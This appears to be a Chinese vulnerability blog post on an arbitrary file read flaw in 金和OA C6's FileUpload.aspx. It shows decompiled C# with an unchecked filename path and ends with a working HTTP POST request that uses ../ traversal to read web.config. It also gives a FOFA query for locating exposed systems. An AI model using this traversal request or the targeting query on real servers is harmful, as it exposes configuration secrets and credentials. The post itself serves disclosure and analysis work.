金和OA FileUpload.aspx 文件读取漏洞


漏洞简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 FileUpload.aspx 接口存在任意文件读取漏洞。攻击者通过构造恶意请求访问该接口,传入任意文件路径参数,实现服务器上任意文件的读取,影响系统敏感数据的泄露和信息安全。

影响版本

金和OA C6

fofa语法

app="金和网络-金和OA"

漏洞分析

根据 FileUpload.aspx 的源码,在 bin 目录下查找 JHSoft.WCF.dll 将其进行反编译后找到 FileUpload 的处理逻辑

protected void Page_Load(object sender, EventArgs e)
{
  string str1 = this.Request["filename"] == null ? "" : this.Request["filename"].ToString();
  string str2 = string.Empty;
  if (string.op_Inequality(str1, ""))
  {
    DirectoryInfo parent = Directory.GetParent(AppDomain.CurrentDomain.BaseDirectory.ToString());
    string _SrcFilePath = string.op_Equality(ConfigurationSettings.AppSettings["FilServer"], "") ? $"{parent.ToString().ToLower().Replace("\\c6", "")}\\Resource\\GovFiles\\{str1}" : $"{parent.ToString().ToLower().Replace("\\c6", "")}\\upload\\Resource\\GovFiles\\{str1}";
    string str3 = _SrcFilePath;
    str2 = new Upload().FindFilebyAbsolutePath(_SrcFilePath);
    if (string.op_Equality(str2, ""))
    {
      this.Response.Write("文件不存在,文件名:" + str1);
      this.Response.Write($"请在{str3}目录下查找");
      return;
    }
  }
  this.Response.Buffer = true;
  this.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
  this.Response.Expires = 0;
  this.Response.CacheControl = "no-cache";
  FileStream fileStream = new FileStream(str2, (FileMode) 3);
  byte[] numArray = new byte[(int) ((Stream) fileStream).Length];
  ((Stream) fileStream).Read(numArray, 0, numArray.Length);
  ((Stream) fileStream).Close();
  if (numArray == null)
    return;
  try
  {
    this.Response.Clear();
    this.Response.ClearHeaders();
    this.Response.Buffer = true;
    this.Response.ContentType = "application/octet-stream";
    this.Response.AppendHeader("Content-Length", numArray.Length.ToString());
    if (this.Request.UserAgent.ToLower().IndexOf("firefox") > -1)
      this.Response.AddHeader("Content-Disposition", $"attachment;filename=\"{str1}\"");
    else
      this.Response.AppendHeader("Content-Disposition", "attachment;  filename=" + HttpUtility.UrlEncode(Encoding.UTF8.GetBytes(str1)));
    this.Response.BinaryWrite(numArray);
    this.Response.Flush();
    this.Response.End();
  }
  catch (Exception ex)
  {
  }
}

参数filename被直接拼接进$"{parent.ToString().ToLower().Replace("\\c6", "")}\\upload\\Resource\\GovFiles\\{str1}"; 中,对参数没有任何过滤或校验,然后将路径使用FileStream进行文件操作并响应在body中,从而造成任意文件读取漏洞。

漏洞复现

POST /c6/JHSoft.WCF/FunctionNew/FileUpload.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
Content-Type: application/x-www-form-urlencoded

filename=../../../c6/web.config

可以成功读取到 web.config 的文件内容并回显。


手机扫码阅读

汉王e脸通综合管理平台 searchSystemRoles.do SQL注入漏洞

东胜物流软件 DsWebService.asmx 多个SQL注入漏洞

评 论